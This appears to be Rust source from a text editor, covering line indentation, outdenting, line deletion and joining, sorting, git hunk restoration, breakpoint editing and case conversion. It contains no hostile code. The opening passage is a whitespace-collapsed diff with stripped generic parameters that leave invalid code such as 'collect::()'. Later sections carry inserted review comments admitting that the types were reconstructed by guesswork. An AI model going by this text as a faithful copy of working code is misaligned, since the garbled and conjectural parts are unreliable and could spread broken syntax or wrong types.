Vec<(Range, String)>, + delta_for_start_row: u32, + cx: &App, + ) -> u32 { + let settings = buffer.language_settings_at(selection.start, cx); + let tab_size = settings.tab_size.get(); + let indent_kind = if settings.hard_tabs { + IndentKind::Tab + } else { + IndentKind::Space + }; + let mut start_row = selection.start.row; + let mut end_row = selection.end.row + 1; + + // If a selection ends at the beginning of a line, don't indent + // that last line. + if selection.end.column == 0 && selection.end.row > selection.start.row { + end_row -= 1; + } + + // Avoid re-indenting a row that has already been indented by a + // previous selection, but still update this selection's column + // to reflect that indentation. + if delta_for_start_row > 0 { + start_row += 1; + selection.start.column += delta_for_start_row; + if selection.end.row == selection.start.row { + selection.end.column += delta_for_start_row; + } + } + + let mut delta_for_end_row = 0; + let has_multiple_rows = start_row + 1 != end_row; + for row in start_row..end_row { + let current_indent = snapshot.indent_size_for_line(MultiBufferRow(row)); + let indent_delta = match (current_indent.kind, indent_kind) { + (IndentKind::Space, IndentKind::Space) => { + let columns_to_next_tab_stop = tab_size - (current_indent.len % tab_size); + IndentSize::spaces(columns_to_next_tab_stop) + } + (IndentKind::Tab, IndentKind::Space) => IndentSize::spaces(tab_size), + (_, IndentKind::Tab) => IndentSize::tab(), + }; + + let start = if has_multiple_rows || current_indent.len < selection.start.column { + 0 + } else { + selection.start.column + }; + let row_start = Point::new(row, start); + edits.push(( + row_start..row_start, + indent_delta.chars().collect::(), + )); + + // Update this selection's endpoints to reflect the indentation. 
// NOTE(review): reconstructed from a whitespace-mangled diff. Generic parameters
// (turbofish arguments, `Context<Self>`, `Arc<str>`, container type params) were
// stripped by extraction and are restored here from surrounding usage — confirm
// against the original file before merging.
//
// Tail of the indent helper above: bump this selection's endpoints by the
// inserted indent and report the column delta for the next selection.
                if row == selection.start.row {
                    selection.start.column += indent_delta.len;
                }
                if row == selection.end.row {
                    selection.end.column += indent_delta.len;
                    delta_for_end_row = indent_delta.len;
                }
            }

            // A single-row selection accumulates both deltas; a multi-row
            // selection only carries the delta applied to its final row.
            if selection.start.row == selection.end.row {
                delta_for_start_row + delta_for_end_row
            } else {
                delta_for_end_row
            }
        }

    /// Outdent all lines spanned by the current selections by one tab stop
    /// (or one tab character), skipping rows already outdented by a previous
    /// selection.
    pub fn outdent(&mut self, _: &Outdent, window: &mut Window, cx: &mut Context<Self>) {
        if self.read_only(cx) {
            return;
        }
        self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction);
        let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx));
        let selections = self.selections.all::<Point>(cx);
        let mut deletion_ranges = Vec::new();
        let mut last_outdent = None;
        {
            let buffer = self.buffer.read(cx);
            let snapshot = buffer.snapshot(cx);
            for selection in &selections {
                let settings = buffer.language_settings_at(selection.start, cx);
                let tab_size = settings.tab_size.get();
                let mut rows = selection.spanned_rows(false, &display_map);

                // Avoid re-outdenting a row that has already been outdented by a
                // previous selection.
                if let Some(last_row) = last_outdent {
                    if last_row == rows.start {
                        rows.start = rows.start.next_row();
                    }
                }
                let has_multiple_rows = rows.len() > 1;
                for row in rows.iter_rows() {
                    let indent_size = snapshot.indent_size_for_line(row);
                    if indent_size.len > 0 {
                        // Delete back to the previous tab stop for spaces, or a
                        // single character for hard tabs.
                        let deletion_len = match indent_size.kind {
                            IndentKind::Space => {
                                let columns_to_prev_tab_stop = indent_size.len % tab_size;
                                if columns_to_prev_tab_stop == 0 {
                                    tab_size
                                } else {
                                    columns_to_prev_tab_stop
                                }
                            }
                            IndentKind::Tab => 1,
                        };
                        let start = if has_multiple_rows
                            || deletion_len > selection.start.column
                            || indent_size.len < selection.start.column
                        {
                            0
                        } else {
                            selection.start.column - deletion_len
                        };
                        deletion_ranges.push(
                            Point::new(row.0, start)..Point::new(row.0, start + deletion_len),
                        );
                        last_outdent = Some(row);
                    }
                }
            }
        }

        self.transact(window, cx, |this, window, cx| {
            this.buffer.update(cx, |buffer, cx| {
                let empty_str: Arc<str> = Arc::default();
                buffer.edit(
                    deletion_ranges
                        .into_iter()
                        .map(|range| (range, empty_str.clone())),
                    None,
                    cx,
                );
            });
            let selections = this.selections.all::<usize>(cx);
            this.change_selections(Some(Autoscroll::fit()), window, cx, |s| {
                s.select(selections)
            });
        });
    }

    /// Re-run language-aware auto-indentation over the selected ranges.
    pub fn autoindent(&mut self, _: &AutoIndent, window: &mut Window, cx: &mut Context<Self>) {
        if self.read_only(cx) {
            return;
        }
        self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction);
        let selections = self
            .selections
            .all::<usize>(cx)
            .into_iter()
            .map(|s| s.range());

        self.transact(window, cx, |this, window, cx| {
            this.buffer.update(cx, |buffer, cx| {
                buffer.autoindent_ranges(selections, cx);
            });
            let selections = this.selections.all::<usize>(cx);
            this.change_selections(Some(Autoscroll::fit()), window, cx, |s| {
                s.select(selections)
            });
        });
    }

    /// Delete every line intersecting a selection, merging contiguous regions,
    /// and restore each cursor to its goal column on the surviving line.
    pub fn delete_line(&mut self, _: &DeleteLine, window: &mut Window, cx: &mut Context<Self>) {
        self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction);
        let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx));
        let selections = self.selections.all::<Point>(cx);

        let mut new_cursors = Vec::new();
        let mut edit_ranges = Vec::new();
        let mut selections = selections.iter().peekable();
        while let Some(selection) = selections.next() {
            let mut rows = selection.spanned_rows(false, &display_map);
            let goal_display_column = selection.head().to_display_point(&display_map).column();

            // Accumulate contiguous regions of rows that we want to delete.
            while let Some(next_selection) = selections.peek() {
                let next_rows = next_selection.spanned_rows(false, &display_map);
                if next_rows.start <= rows.end {
                    rows.end = next_rows.end;
                    selections.next().unwrap();
                } else {
                    break;
                }
            }

            let buffer = &display_map.buffer_snapshot;
            let mut edit_start = Point::new(rows.start.0, 0).to_offset(buffer);
            let edit_end;
            let cursor_buffer_row;
            if buffer.max_point().row >= rows.end.0 {
                // If there's a line after the range, delete the \n from the end of the row range
                // and position the cursor on the next line.
                edit_end = Point::new(rows.end.0, 0).to_offset(buffer);
                cursor_buffer_row = rows.end;
            } else {
                // If there isn't a line after the range, delete the \n from the line before the
                // start of the row range and position the cursor there.
                edit_start = edit_start.saturating_sub(1);
                edit_end = buffer.len();
                cursor_buffer_row = rows.start.previous_row();
            }

            let mut cursor = Point::new(cursor_buffer_row.0, 0).to_display_point(&display_map);
            *cursor.column_mut() =
                cmp::min(goal_display_column, display_map.line_len(cursor.row()));

            new_cursors.push((
                selection.id,
                buffer.anchor_after(cursor.to_point(&display_map)),
            ));
            edit_ranges.push(edit_start..edit_end);
        }

        self.transact(window, cx, |this, window, cx| {
            let buffer = this.buffer.update(cx, |buffer, cx| {
                let empty_str: Arc<str> = Arc::default();
                buffer.edit(
                    edit_ranges
                        .into_iter()
                        .map(|range| (range, empty_str.clone())),
                    None,
                    cx,
                );
                buffer.snapshot(cx)
            });
            let new_selections = new_cursors
                .into_iter()
                .map(|(id, cursor)| {
                    let cursor = cursor.to_point(&buffer);
                    Selection {
                        id,
                        start: cursor,
                        end: cursor,
                        reversed: false,
                        goal: SelectionGoal::None,
                    }
                })
                .collect();

            this.change_selections(Some(Autoscroll::fit()), window, cx, |s| {
                s.select(new_selections);
            });
        });
    }

    /// Join each selected line with the following line. When
    /// `insert_whitespace` is true a single space replaces the removed
    /// newline and indentation (unless the next line is blank).
    pub fn join_lines_impl(
        &mut self,
        insert_whitespace: bool,
        window: &mut Window,
        cx: &mut Context<Self>,
    ) {
        if self.read_only(cx) {
            return;
        }
        let mut row_ranges = Vec::<Range<MultiBufferRow>>::new();
        for selection in self.selections.all::<Point>(cx) {
            let start = MultiBufferRow(selection.start.row);
            // Treat single line selections as if they include the next line. Otherwise this action
            // would do nothing for single line selections individual cursors.
            let end = if selection.start.row == selection.end.row {
                MultiBufferRow(selection.start.row + 1)
            } else {
                MultiBufferRow(selection.end.row)
            };

            // Merge overlapping/adjacent row ranges so each join happens once.
            if let Some(last_row_range) = row_ranges.last_mut() {
                if start <= last_row_range.end {
                    last_row_range.end = end;
                    continue;
                }
            }
            row_ranges.push(start..end);
        }

        let snapshot = self.buffer.read(cx).snapshot(cx);
        let mut cursor_positions = Vec::new();
        for row_range in &row_ranges {
            let anchor = snapshot.anchor_before(Point::new(
                row_range.end.previous_row().0,
                snapshot.line_len(row_range.end.previous_row()),
            ));
            cursor_positions.push(anchor..anchor);
        }

        self.transact(window, cx, |this, window, cx| {
            // Edit bottom-up so earlier joins don't shift later coordinates.
            for row_range in row_ranges.into_iter().rev() {
                for row in row_range.iter_rows().rev() {
                    let end_of_line = Point::new(row.0, snapshot.line_len(row));
                    let next_line_row = row.next_row();
                    let indent = snapshot.indent_size_for_line(next_line_row);
                    let start_of_next_line = Point::new(next_line_row.0, indent.len);

                    let replace =
                        if snapshot.line_len(next_line_row) > indent.len && insert_whitespace {
                            " "
                        } else {
                            ""
                        };

                    this.buffer.update(cx, |buffer, cx| {
                        buffer.edit([(end_of_line..start_of_next_line, replace)], None, cx)
                    });
                }
            }

            this.change_selections(Some(Autoscroll::fit()), window, cx, |s| {
                s.select_anchor_ranges(cursor_positions)
            });
        });
    }

    /// Join selected lines, separating the joined content with a space.
    pub fn join_lines(&mut self, _: &JoinLines, window: &mut Window, cx: &mut Context<Self>) {
        self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction);
        self.join_lines_impl(true, window, cx);
    }

    /// Sort the selected lines lexicographically (case-sensitive).
    pub fn sort_lines_case_sensitive(
        &mut self,
        _: &SortLinesCaseSensitive,
        window: &mut Window,
        cx: &mut Context<Self>,
    ) {
        self.manipulate_lines(window, cx, |lines| lines.sort())
    }

    /// Sort the selected lines lexicographically, ignoring case.
    pub fn sort_lines_case_insensitive(
        &mut self,
        _: &SortLinesCaseInsensitive,
        window: &mut Window,
        cx: &mut Context<Self>,
    ) {
        self.manipulate_lines(window, cx, |lines| {
            lines.sort_by_key(|line|
// NOTE(review): reconstructed from a whitespace-mangled diff. Generic parameters
// were stripped by extraction and are restored from surrounding usage
// (`HashSet`, `Vec<Range<Point>>`, `Option<Anchor>`, `summary_for_anchor::<Point>`,
// `has_flag::<DebuggerFeatureFlag>`) — confirm against the original file.
            line.to_lowercase())
        })
    }

    /// Keep only the first occurrence of each selected line, comparing
    /// case-insensitively.
    pub fn unique_lines_case_insensitive(
        &mut self,
        _: &UniqueLinesCaseInsensitive,
        window: &mut Window,
        cx: &mut Context<Self>,
    ) {
        self.manipulate_lines(window, cx, |lines| {
            let mut seen = HashSet::default();
            lines.retain(|line| seen.insert(line.to_lowercase()));
        })
    }

    /// Keep only the first occurrence of each selected line (exact match).
    pub fn unique_lines_case_sensitive(
        &mut self,
        _: &UniqueLinesCaseSensitive,
        window: &mut Window,
        cx: &mut Context<Self>,
    ) {
        self.manipulate_lines(window, cx, |lines| {
            let mut seen = HashSet::default();
            lines.retain(|line| seen.insert(*line));
        })
    }

    /// Reload the file backing this editor from disk, surfacing any error as a
    /// notification.
    pub fn reload_file(&mut self, _: &ReloadFile, window: &mut Window, cx: &mut Context<Self>) {
        let Some(project) = self.project.clone() else {
            return;
        };
        self.reload(project, window, cx)
            .detach_and_notify_err(window, cx);
    }

    /// Restore the full contents of every buffer touched by the current
    /// selections.
    pub fn restore_file(
        &mut self,
        _: &::git::RestoreFile,
        window: &mut Window,
        cx: &mut Context<Self>,
    ) {
        self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction);
        let mut buffer_ids = HashSet::default();
        let snapshot = self.buffer().read(cx).snapshot(cx);
        for selection in self.selections.all::<usize>(cx) {
            buffer_ids.extend(snapshot.buffer_ids_for_range(selection.range()))
        }

        let buffer = self.buffer().read(cx);
        let ranges = buffer_ids
            .into_iter()
            .flat_map(|buffer_id| buffer.excerpt_ranges_for_buffer(buffer_id, cx))
            .collect::<Vec<_>>();

        self.restore_hunks_in_ranges(ranges, window, cx);
    }

    /// Revert the diff hunks intersecting the current selections.
    pub fn git_restore(&mut self, _: &Restore, window: &mut Window, cx: &mut Context<Self>) {
        self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction);
        let selections = self
            .selections
            .all(cx)
            .into_iter()
            .map(|s| s.range())
            .collect();
        self.restore_hunks_in_ranges(selections, window, cx);
    }

    /// Revert (and unstage) every diff hunk intersecting `ranges`, grouped by
    /// the buffer that owns each hunk.
    pub fn restore_hunks_in_ranges(
        &mut self,
        ranges: Vec<Range<Point>>,
        window: &mut Window,
        cx: &mut Context<Self>,
    ) {
        let mut revert_changes = HashMap::default();
        let chunk_by = self
            .snapshot(window, cx)
            .hunks_for_ranges(ranges)
            .into_iter()
            .chunk_by(|hunk| hunk.buffer_id);
        for (buffer_id, hunks) in &chunk_by {
            let hunks = hunks.collect::<Vec<_>>();
            for hunk in &hunks {
                self.prepare_restore_change(&mut revert_changes, hunk, cx);
            }
            self.do_stage_or_unstage(false, buffer_id, hunks.into_iter(), cx);
        }
        drop(chunk_by);
        if !revert_changes.is_empty() {
            self.transact(window, cx, |editor, window, cx| {
                editor.restore(revert_changes, window, cx);
            });
        }
    }

    /// Open a terminal in the directory containing the active excerpt's file.
    pub fn open_active_item_in_terminal(
        &mut self,
        _: &OpenInTerminal,
        window: &mut Window,
        cx: &mut Context<Self>,
    ) {
        if let Some(working_directory) = self.active_excerpt(cx).and_then(|(_, buffer, _)| {
            let project_path = buffer.read(cx).project_path(cx)?;
            let project = self.project.as_ref()?.read(cx);
            let entry = project.entry_for_path(&project_path, cx)?;
            // Prefer the canonical (symlink-resolved) path when available.
            let parent = match &entry.canonical_path {
                Some(canonical_path) => canonical_path.to_path_buf(),
                None => project.absolute_path(&project_path, cx)?,
            }
            .parent()?
            .to_path_buf();
            Some(parent)
        }) {
            window.dispatch_action(OpenTerminal { working_directory }.boxed_clone(), cx);
        }
    }

    /// Show the breakpoint context menu pinned at `clicked_point`, anchored to
    /// `position` (or the start of `display_row` when no anchor is given).
    fn set_breakpoint_context_menu(
        &mut self,
        display_row: DisplayRow,
        position: Option<Anchor>,
        clicked_point: gpui::Point<Pixels>,
        window: &mut Window,
        cx: &mut Context<Self>,
    ) {
        if !cx.has_flag::<DebuggerFeatureFlag>() {
            return;
        }
        let source = self
            .buffer
            .read(cx)
            .snapshot(cx)
            .anchor_before(Point::new(display_row.0, 0u32));

        let context_menu = self.breakpoint_context_menu(position.unwrap_or(source), window, cx);

        self.mouse_context_menu = MouseContextMenu::pinned_to_editor(
            self,
            source,
            clicked_point,
            context_menu,
            window,
            cx,
        );
    }

    /// Insert an inline prompt block above `anchor` for editing the given
    /// breakpoint's log message or condition, and focus it.
    fn add_edit_breakpoint_block(
        &mut self,
        anchor: Anchor,
        breakpoint: &Breakpoint,
        edit_action: BreakpointPromptEditAction,
        window: &mut Window,
        cx: &mut Context<Self>,
    ) {
        let weak_editor = cx.weak_entity();
        let bp_prompt = cx.new(|cx| {
            BreakpointPromptEditor::new(
                weak_editor,
                anchor,
                breakpoint.clone(),
                edit_action,
                window,
                cx,
            )
        });

        // Prompt height: its content rows plus two rows of chrome.
        let height = bp_prompt.update(cx, |this, cx| {
            this.prompt
                .update(cx, |prompt, cx| prompt.max_point(cx).row().0 + 1 + 2)
        });
        let cloned_prompt = bp_prompt.clone();
        let blocks = vec![BlockProperties {
            style: BlockStyle::Sticky,
            placement: BlockPlacement::Above(anchor),
            height: Some(height),
            render: Arc::new(move |cx| {
                *cloned_prompt.read(cx).gutter_dimensions.lock() = *cx.gutter_dimensions;
                cloned_prompt.clone().into_any_element()
            }),
            priority: 0,
        }];

        let focus_handle = bp_prompt.focus_handle(cx);
        window.focus(&focus_handle);

        let block_ids = self.insert_blocks(blocks, None, cx);
        bp_prompt.update(cx, |prompt, _| {
            prompt.add_block_ids(block_ids);
        });
    }

    /// Find the breakpoint (if any) on the given multibuffer row.
    pub(crate) fn breakpoint_at_row(
        &self,
        row: u32,
        window: &mut Window,
        cx: &mut Context<Self>,
    ) -> Option<(Anchor, Breakpoint)> {
        let snapshot = self.snapshot(window, cx);
        let breakpoint_position = snapshot.buffer_snapshot.anchor_before(Point::new(row, 0));

        self.breakpoint_at_anchor(breakpoint_position, &snapshot, cx)
    }

    /// Find the breakpoint on the same buffer row as `breakpoint_position`,
    /// mapping its buffer-local anchor back into this multibuffer's excerpt.
    pub(crate) fn breakpoint_at_anchor(
        &self,
        breakpoint_position: Anchor,
        snapshot: &EditorSnapshot,
        cx: &mut Context<Self>,
    ) -> Option<(Anchor, Breakpoint)> {
        let project = self.project.clone()?;

        let buffer_id = breakpoint_position.buffer_id.or_else(|| {
            snapshot
                .buffer_snapshot
                .buffer_id_for_excerpt(breakpoint_position.excerpt_id)
        })?;

        let enclosing_excerpt = breakpoint_position.excerpt_id;
        let buffer = project.read_with(cx, |project, cx| project.buffer_for_id(buffer_id, cx))?;
        let buffer_snapshot = buffer.read(cx).snapshot();

        let row = buffer_snapshot
            .summary_for_anchor::<Point>(&breakpoint_position.text_anchor)
            .row;

        let line_len = snapshot.buffer_snapshot.line_len(MultiBufferRow(row));
        let anchor_end = snapshot
            .buffer_snapshot
            .anchor_after(Point::new(row, line_len));

        let bp = self
            .breakpoint_store
            .as_ref()?
            .read_with(cx, |breakpoint_store, cx| {
                breakpoint_store
                    .breakpoints(
                        &buffer,
                        Some(breakpoint_position.text_anchor..anchor_end.text_anchor),
                        &buffer_snapshot,
                        cx,
                    )
                    .next()
                    .and_then(|(anchor, bp)| {
                        let breakpoint_row = buffer_snapshot
                            .summary_for_anchor::<Point>(anchor)
                            .row;

                        // Only accept a hit on exactly this row.
                        if breakpoint_row == row {
                            snapshot
                                .buffer_snapshot
                                .anchor_in_excerpt(enclosing_excerpt, *anchor)
                                .map(|anchor| (anchor, bp.clone()))
                        } else {
                            None
                        }
                    })
            });
        bp
    }

    /// Open the log-message prompt for the breakpoint under each cursor,
    /// creating an enabled breakpoint where none exists.
    pub fn edit_log_breakpoint(
        &mut self,
        _: &EditLogBreakpoint,
        window: &mut Window,
        cx: &mut Context<Self>,
    ) {
        for (anchor, breakpoint) in self.breakpoints_at_cursors(window, cx) {
            let breakpoint = breakpoint.unwrap_or_else(|| Breakpoint {
                message: None,
                state: BreakpointState::Enabled,
                condition: None,
                hit_condition: None,
            });

            self.add_edit_breakpoint_block(
                anchor,
                &breakpoint,
                BreakpointPromptEditAction::Log,
                window,
                cx,
            );
        }
    }

    /// For each cursor, return the anchor of the breakpoint on its row (or an
    /// anchor at the row start if there is none) plus the breakpoint itself.
    fn breakpoints_at_cursors(
        &self,
        window: &mut Window,
        cx: &mut Context<Self>,
    ) -> Vec<(Anchor, Option<Breakpoint>)> {
        let snapshot = self.snapshot(window, cx);
        let cursors = self
            .selections
            .disjoint_anchors()
            .into_iter()
            .map(|selection| {
                let cursor_position: Point = selection.head().to_point(&snapshot.buffer_snapshot);

                let breakpoint_position = self
                    .breakpoint_at_row(cursor_position.row, window, cx)
                    .map(|bp| bp.0)
                    .unwrap_or_else(|| {
                        snapshot
                            .display_snapshot
                            .buffer_snapshot
                            .anchor_after(Point::new(cursor_position.row, 0))
                    });

                let breakpoint = self
                    .breakpoint_at_anchor(breakpoint_position, &snapshot, cx)
                    .map(|(anchor, breakpoint)| (anchor, Some(breakpoint)));

                breakpoint.unwrap_or_else(|| (breakpoint_position, None))
            })
            // There might be multiple cursors on the same line; all of them should have the same anchors though as their breakpoints positions, which makes it possible to sort and dedup the list.
            // NOTE(review): collection type was stripped in extraction; `BTreeMap`
            // matches the sort-and-dedup comment — confirm `Anchor: Ord` holds.
            .collect::<BTreeMap<_, _>>();

        cursors.into_iter().collect()
    }

    /// Enable every currently-disabled breakpoint under the cursors.
    pub fn enable_breakpoint(
        &mut self,
        _: &crate::actions::EnableBreakpoint,
        window: &mut Window,
        cx: &mut Context<Self>,
    ) {
        for (anchor, breakpoint) in self.breakpoints_at_cursors(window, cx) {
            let Some(breakpoint) = breakpoint.filter(|breakpoint| breakpoint.is_disabled()) else {
                continue;
            };
            self.edit_breakpoint_at_anchor(
                anchor,
                breakpoint,
                BreakpointEditAction::InvertState,
                cx,
            );
        }
    }

    /// Disable every currently-enabled breakpoint under the cursors.
    pub fn disable_breakpoint(
        &mut self,
        _: &crate::actions::DisableBreakpoint,
        window: &mut Window,
        cx: &mut Context<Self>,
    ) {
        for (anchor, breakpoint) in self.breakpoints_at_cursors(window, cx) {
            let Some(breakpoint) = breakpoint.filter(|breakpoint| breakpoint.is_enabled()) else {
                continue;
            };
            self.edit_breakpoint_at_anchor(
                anchor,
                breakpoint,
                BreakpointEditAction::InvertState,
                cx,
            );
        }
    }

    /// Toggle the breakpoint under each cursor, creating a standard breakpoint
    /// where none exists.
    pub fn toggle_breakpoint(
        &mut self,
        _: &crate::actions::ToggleBreakpoint,
        window: &mut Window,
        cx: &mut Context<Self>,
    ) {
        for (anchor, breakpoint) in self.breakpoints_at_cursors(window, cx) {
            if let Some(breakpoint) = breakpoint {
                self.edit_breakpoint_at_anchor(
                    anchor,
                    breakpoint,
                    BreakpointEditAction::Toggle,
                    cx,
                );
            } else {
                self.edit_breakpoint_at_anchor(
                    anchor,
                    Breakpoint::new_standard(),
                    BreakpointEditAction::Toggle,
                    cx,
                );
            }
        }
    }

    /// Apply `edit_action` to the breakpoint at `breakpoint_position`, first
    /// resolving which buffer owns the anchor (falling back to the first
    /// excerpt's buffer for `Anchor::min()`).
    pub fn edit_breakpoint_at_anchor(
        &mut self,
        breakpoint_position: Anchor,
        breakpoint: Breakpoint,
        edit_action: BreakpointEditAction,
        cx: &mut Context<Self>,
    ) {
        let Some(breakpoint_store) = &self.breakpoint_store else {
            return;
        };

        let Some(buffer_id) = breakpoint_position.buffer_id.or_else(|| {
            if breakpoint_position == Anchor::min() {
                self.buffer()
                    .read(cx)
                    .excerpt_buffer_ids()
                    .into_iter()
                    .next()
            } else {
                None
            }
        }) else {
            return;
        };

        let Some(buffer) = self.buffer().read(cx).buffer(buffer_id) else {
            return;
        };

        breakpoint_store.update(cx,
// NOTE(review): reconstructed from a whitespace-mangled diff. Stripped generic
// parameters (`Option<Entity<BreakpointStore>>`,
// `HashMap<BufferId, Vec<(Range<text::Anchor>, Rope)>>`, `<Fn>` type params,
// turbofish on `all::<…>`) restored from surrounding usage — confirm before merging.
//
// Tail of `edit_breakpoint_at_anchor`: forward the edit to the breakpoint store.
                                       |breakpoint_store, cx| {
            breakpoint_store.toggle_breakpoint(
                buffer,
                (breakpoint_position.text_anchor, breakpoint),
                edit_action,
                cx,
            );
        });

        cx.notify();
    }

    /// Test-only accessor for the breakpoint store.
    #[cfg(any(test, feature = "test-support"))]
    pub fn breakpoint_store(&self) -> Option<Entity<BreakpointStore>> {
        self.breakpoint_store.clone()
    }

    /// Record the edit needed to revert `hunk` to its diff base text, keeping
    /// each buffer's revert list sorted and free of duplicates. Returns `None`
    /// for created files or when the hunk is already recorded.
    pub fn prepare_restore_change(
        &self,
        revert_changes: &mut HashMap<BufferId, Vec<(Range<text::Anchor>, Rope)>>,
        hunk: &MultiBufferDiffHunk,
        cx: &mut App,
    ) -> Option<()> {
        if hunk.is_created_file() {
            return None;
        }
        let buffer = self.buffer.read(cx);
        let diff = buffer.diff_for(hunk.buffer_id)?;
        let buffer = buffer.buffer(hunk.buffer_id)?;
        let buffer = buffer.read(cx);
        let original_text = diff
            .read(cx)
            .base_text()
            .as_rope()
            .slice(hunk.diff_base_byte_range.clone());
        let buffer_snapshot = buffer.snapshot();
        let buffer_revert_changes = revert_changes.entry(buffer.remote_id()).or_default();
        // Insert in sorted position; Err(i) means the hunk isn't present yet.
        if let Err(i) = buffer_revert_changes.binary_search_by(|probe| {
            probe
                .0
                .start
                .cmp(&hunk.buffer_range.start, &buffer_snapshot)
                .then(probe.0.end.cmp(&hunk.buffer_range.end, &buffer_snapshot))
        }) {
            buffer_revert_changes.insert(i, (hunk.buffer_range.clone(), original_text));
            Some(())
        } else {
            None
        }
    }

    /// Reverse the order of the selected lines.
    pub fn reverse_lines(&mut self, _: &ReverseLines, window: &mut Window, cx: &mut Context<Self>) {
        self.manipulate_lines(window, cx, |lines| lines.reverse())
    }

    /// Randomly shuffle the selected lines.
    pub fn shuffle_lines(&mut self, _: &ShuffleLines, window: &mut Window, cx: &mut Context<Self>) {
        self.manipulate_lines(window, cx, |lines| lines.shuffle(&mut thread_rng()))
    }

    /// Run `callback` over the full lines spanned by each selection, replacing
    /// them with the (possibly re-ordered, filtered, or grown) result and
    /// re-selecting the affected rows.
    fn manipulate_lines<Fn>(
        &mut self,
        window: &mut Window,
        cx: &mut Context<Self>,
        mut callback: Fn,
    ) where
        Fn: FnMut(&mut Vec<&str>),
    {
        self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction);

        let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx));
        let buffer = self.buffer.read(cx).snapshot(cx);

        let mut edits = Vec::new();

        let selections = self.selections.all::<Point>(cx);
        let mut selections = selections.iter().peekable();
        let mut contiguous_row_selections = Vec::new();
        let mut new_selections = Vec::new();
        let mut added_lines = 0;
        let mut removed_lines = 0;

        while let Some(selection) = selections.next() {
            let (start_row, end_row) = consume_contiguous_rows(
                &mut contiguous_row_selections,
                selection,
                &display_map,
                &mut selections,
            );

            let start_point = Point::new(start_row.0, 0);
            let end_point = Point::new(
                end_row.previous_row().0,
                buffer.line_len(end_row.previous_row()),
            );
            let text = buffer
                .text_for_range(start_point..end_point)
                .collect::<String>();

            let mut lines = text.split('\n').collect_vec();

            let lines_before = lines.len();
            callback(&mut lines);
            let lines_after = lines.len();

            edits.push((start_point..end_point, lines.join("\n")));

            // Selections must change based on added and removed line count
            let start_row =
                MultiBufferRow(start_point.row + added_lines as u32 - removed_lines as u32);
            let end_row = MultiBufferRow(start_row.0 + lines_after.saturating_sub(1) as u32);
            new_selections.push(Selection {
                id: selection.id,
                start: start_row,
                end: end_row,
                goal: SelectionGoal::None,
                reversed: selection.reversed,
            });

            if lines_after > lines_before {
                added_lines += lines_after - lines_before;
            } else if lines_before > lines_after {
                removed_lines += lines_before - lines_after;
            }
        }

        self.transact(window, cx, |this, window, cx| {
            let buffer = this.buffer.update(cx, |buffer, cx| {
                buffer.edit(edits, None, cx);
                buffer.snapshot(cx)
            });

            // Recalculate offsets on newly edited buffer
            let new_selections = new_selections
                .iter()
                .map(|s| {
                    let start_point = Point::new(s.start.0, 0);
                    let end_point = Point::new(s.end.0, buffer.line_len(s.end));
                    Selection {
                        id: s.id,
                        start: buffer.point_to_offset(start_point),
                        end: buffer.point_to_offset(end_point),
                        goal: s.goal,
                        reversed: s.reversed,
                    }
                })
                .collect();

            this.change_selections(Some(Autoscroll::fit()), window, cx, |s| {
                s.select(new_selections);
            });

            this.request_autoscroll(Autoscroll::fit(), cx);
        });
    }

    /// Lowercase the selection if it contains any uppercase character,
    /// otherwise uppercase it.
    pub fn toggle_case(&mut self, _: &ToggleCase, window: &mut Window, cx: &mut Context<Self>) {
        self.manipulate_text(window, cx, |text| {
            let has_upper_case_characters = text.chars().any(|c| c.is_uppercase());
            if has_upper_case_characters {
                text.to_lowercase()
            } else {
                text.to_uppercase()
            }
        })
    }

    /// Convert the selected text to UPPER CASE.
    pub fn convert_to_upper_case(
        &mut self,
        _: &ConvertToUpperCase,
        window: &mut Window,
        cx: &mut Context<Self>,
    ) {
        self.manipulate_text(window, cx, |text| text.to_uppercase())
    }

    /// Convert the selected text to lower case.
    pub fn convert_to_lower_case(
        &mut self,
        _: &ConvertToLowerCase,
        window: &mut Window,
        cx: &mut Context<Self>,
    ) {
        self.manipulate_text(window, cx, |text| text.to_lowercase())
    }

    /// Convert the selected text to Title Case, line by line.
    pub fn convert_to_title_case(
        &mut self,
        _: &ConvertToTitleCase,
        window: &mut Window,
        cx: &mut Context<Self>,
    ) {
        self.manipulate_text(window, cx, |text| {
            text.split('\n')
                .map(|line| line.to_case(Case::Title))
                .join("\n")
        })
    }

    /// Convert the selected text to snake_case.
    pub fn convert_to_snake_case(
        &mut self,
        _: &ConvertToSnakeCase,
        window: &mut Window,
        cx: &mut Context<Self>,
    ) {
        self.manipulate_text(window, cx, |text| text.to_case(Case::Snake))
    }

    /// Convert the selected text to kebab-case.
    pub fn convert_to_kebab_case(
        &mut self,
        _: &ConvertToKebabCase,
        window: &mut Window,
        cx: &mut Context<Self>,
    ) {
        self.manipulate_text(window, cx, |text| text.to_case(Case::Kebab))
    }

    /// Convert the selected text to UpperCamelCase, line by line.
    pub fn convert_to_upper_camel_case(
        &mut self,
        _: &ConvertToUpperCamelCase,
        window: &mut Window,
        cx: &mut Context<Self>,
    ) {
        self.manipulate_text(window, cx, |text| {
            text.split('\n')
                .map(|line| line.to_case(Case::UpperCamel))
                .join("\n")
        })
    }

    /// Convert the selected text to lowerCamelCase.
    pub fn convert_to_lower_camel_case(
        &mut self,
        _: &ConvertToLowerCamelCase,
        window: &mut Window,
        cx: &mut Context<Self>,
    ) {
        self.manipulate_text(window, cx, |text| text.to_case(Case::Camel))
    }

    /// Invert the case of every character in the selection.
    pub fn convert_to_opposite_case(
        &mut self,
        _: &ConvertToOppositeCase,
        window: &mut Window,
        cx: &mut Context<Self>,
    ) {
        self.manipulate_text(window, cx, |text| {
            text.chars()
                .fold(String::with_capacity(text.len()), |mut t, c| {
                    if c.is_uppercase() {
                        t.extend(c.to_lowercase());
                    } else {
                        t.extend(c.to_uppercase());
                    }
                    t
                })
        })
    }

    /// Apply the ROT13 substitution cipher to ASCII letters in the selection.
    pub fn convert_to_rot13(
        &mut self,
        _: &ConvertToRot13,
        window: &mut Window,
        cx: &mut Context<Self>,
    ) {
        self.manipulate_text(window, cx, |text| {
            text.chars()
                .map(|c| match c {
                    'A'..='M' | 'a'..='m' => ((c as u8) + 13) as char,
